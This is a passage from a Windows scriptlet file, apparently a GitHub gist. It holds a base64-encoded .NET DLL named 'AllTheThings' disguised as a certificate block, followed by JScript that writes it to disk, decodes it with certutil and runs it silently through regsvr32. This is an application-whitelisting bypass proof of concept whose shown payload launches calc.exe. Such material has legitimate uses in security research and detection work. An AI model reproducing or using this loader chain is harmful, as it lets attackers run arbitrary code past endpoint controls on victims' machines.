bABtc2NvcmxpYgBQcm9ncmFtAFRoaW5nMABUaGluZzEAQnlwYXNzAEV4cG9ydHMA\
TWFpbgBFeGVjAFVuaW5zdGFsbABzYXZlZFN0YXRlAFJlZ2lzdGVyQ2xhc3MAa2V5\
AFVuUmVnaXN0ZXJDbGFzcwBFbnRyeVBvaW50AGh3bmQAaGluc3QAbHBzekNtZExp\
bmUAbkNtZFNob3cARGxsUmVnaXN0ZXJTZXJ2ZXIARGxsVW5yZWdpc3RlclNlcnZl\
cgBBbGxUaGVUaGluZ3MAAABLSABlAGwAbABvACAARgByAG8AbQAgAE0AYQBpAG4A\
LgAuAC4ASQAgAEQAbwBuACcAdAAgAEQAbwAgAEEAbgB5AHQAaABpAG4AZwABEWMA\
YQBsAGMALgBlAHgAZQAANUgAZQBsAGwAbwAgAFQAaABlAHIAZQAgAEYAcgBvAG0A\
IABVAG4AaQBuAHMAdABhAGwAbAAAL0kAIABhAG0AIABhACAAYgBhAHMAaQBjACAA\
QwBPAE0AIABPAGIAagBlAGMAdAAANUkAIABzAGgAbwB1AGwAZABuACcAdAAgAHIA\
ZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQABRUkAIABzAGgAbwB1AGwAZABuACcA\
dAAgAHIAZQBhAGwAbAB5ACAAZQB4AGUAYwB1AHQAZQAgAGUAaQB0AGgAZQByAC4A\
AQAAAB4zgqE0xlNCjdJI5PE1tnEABCABAQgDIAABBSABARERBCABAQIEIAEBDgQA\
AQEOBgABElESTQUgAQERaQUgAQERdQi3elxWGTTgiQiwP19/EdUKOgUBAAEAACkB\
ACQzMUQyQjk2OS03NjA4LTQyNkUtOUQ4RS1BMDlGQzlBNTE2ODAAAAgBAAAAAAAA\
ABQBAA9kbGxndWVzdC5CeXBhc3MAAAgBAAMAAAAAAAMAAAEFIAEBEl0EAQAAAAoA\
BCCAgQEYGA4IBgAAIICBAYCgACQAAASAAACUAAAABgIAAAAkAABSU0ExAAQAAAEA\
AQALQR1gd6ckoaTJoYdu3Tbzd/Munbs0UEf05nIsjyf4fvPHfASpD2Yi9OUqhVDo\
nptUQNXJSz30AxhpDekVvQPzsd2UXd1quH28rmhCh9MI9Y70ejbk1Uq1VnazOj1Q\
1KZPYpfikbWNmiP8LITaM2XQ5TDjYFUoJ/4LxDQ/ZqzYswgBAAgAAAAAAB4BAAEA\
VAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQABAAAAAAAFAQAAAAARAQAMQWxs\
VGhlVGhpbmdzAAAXAQASQ29weXJpZ2h0IMKpICAyMDE2AAApAQAkMDU0N2ZmNDAt\
NTI1NS00MmEyLWJlYjctMmZmMGRiZjdkM2JhAAAMAQAHMS4wLjAuMAAATQEAHC5O\
RVRGcmFtZXdvcmssVmVyc2lvbj12NC41LjIBAFQOFEZyYW1ld29ya0Rpc3BsYXlO\
YW1lFC5ORVQgRnJhbWV3b3JrIDQuNS4yAABIoQBAAIABAAAA/+BIoQhAAIABAAAA\
/+BIoRBAAIABAAAA/+AAAABAAAADAAYAcC4AAAAAAAAAAAAAji4AAAAgAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAIAuAAAAAAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1z\
Y29yZWUuZGxsAAAAAABIoQAgAIABAAAA/+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAGAAAAAAwAAAYAAAAA\
DQAABgAAAAAAAAAAvH9+VwAAAACPQAAAAAAAAAMAAAADAAAAQEAAAExAAABYQAAA\
Gi4AACYuAAAyLgAAXkAAAHBAAACEQAAAAQACAAAARGxsUmVnaXN0ZXJTZXJ2ZXIA\
RGxsVW5yZWdpc3RlclNlcnZlcgBFbnRyeVBvaW50AFxBbGxUaGVUaGluZ3MuZGxs\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAA\
AAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAAA8AwAA\
AAAAAAAAAAA8AzQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAA\
vQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAA\
AAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEA\
bgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAIAAAEAUwB0AHIAaQBuAGcARgBpAGwA\
ZQBJAG4AZgBvAAAAeAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0A\
bQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAA\
AAAAAEIADQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABBAGwA\
bABUAGgAZQBUAGgAaQBuAGcAcwAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkA\
bwBuAAAAAAAxAC4AMAAuADAALgAwAAAAQgARAAEASQBuAHQAZQByAG4AYQBsAE4A\
YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAABIABIA\
AQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA\
dAAgAKkAIAAgADIAMAAxADYAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0A\
YQByAGsAcwAAAAAAAAAAAEoAEQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4A\
YQBtAGUAAABBAGwAbABUAGgAZQBUAGgAaQBuAGcAcwAuAGQAbABsAAAAAAA6AA0A\
AQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAbABsAFQAaABlAFQAaABpAG4A\
ZwBzAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4A\
MAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8A\
bgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAEAAAAByuKK40rqCu\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAAAAA==\
-----END CERTIFICATE-----"
var WshShell = new ActiveXObject("WScript.Shell");
var WshProcEnv = WshShell.Environment("Process");
var process_arch = WshProcEnv("PROCESSOR_ARCHITECTURE");
if(process_arch == "AMD64")
{
SaveStringToFile("AllTheThingsx64.txt", x64dllEncoded);
var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode AllTheThingsx64.txt x64.dll");
sleep(5000);
var execFilex64 = new ActiveXObject("WScript.Shell").Run("regsvr32.exe /s /u x64.dll");
}
else
{
SaveStringToFile("AllTheThingsx86.txt", x86dllEncoded);
var r = new ActiveXObject("WScript.Shell").Run("certutil.exe /decode AllTheThingsx86.txt x86.dll");
sleep(5000);
var execFilex86 = new ActiveXObject("WScript.Shell").Run("regsvr32.exe /s /u x86.dll");
}
]]>
</script>
</registration>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment